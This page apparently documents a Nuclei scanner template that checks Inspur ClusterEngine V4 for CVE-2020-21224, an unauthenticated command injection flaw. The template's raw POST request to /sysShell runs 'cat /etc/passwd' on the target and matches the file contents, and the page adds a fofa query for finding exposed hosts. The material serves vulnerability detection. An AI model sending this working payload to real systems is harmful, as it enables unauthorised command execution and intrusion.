Inspur Clusterengine V4 SYSshell - Remote Command Execution
ID: inspur-clusterengine-rce
Severity: critical
Author: ritikchaddha
Tags: inspur,clusterengine,rce
Description
Section titled “Description”Inspur Clusterengine V4 SYSshell was found and allows remote command execution by design.
YAML Source
Section titled “YAML Source”id: inspur-clusterengine-rce
info: name: Inspur Clusterengine V4 SYSshell - Remote Command Execution author: ritikchaddha severity: critical description: Inspur Clusterengine V4 SYSshell was found and allows remote command execution by design. reference: - https://www.inspursystems.com/ - https://github.com/MzzdToT/ClusterEngineV4.0sysShell_rce - https://nvd.nist.gov/vuln/detail/CVE-2020-21224 - https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-21224 cwe-id: CWE-88 cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: title="TSCEV4.0" product: clusterengine vendor: inspur tags: inspur,clusterengine,rce
http: - raw: - | POST /sysShell HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Cookie: lang=cn
op=doPlease&node=cu01&command=cat+/etc/passwd
redirects: true max-redirects: 2
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a00483046022100a7671fa9c508296a2d08fe50cf7a0ee92ad772abc23708185885f3354cd904dc02210092765b77947f63db43ac43600a33f3042acfaac4dcf4269b04d570be82b47b30:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/inspur-clusterengine-rce.yaml"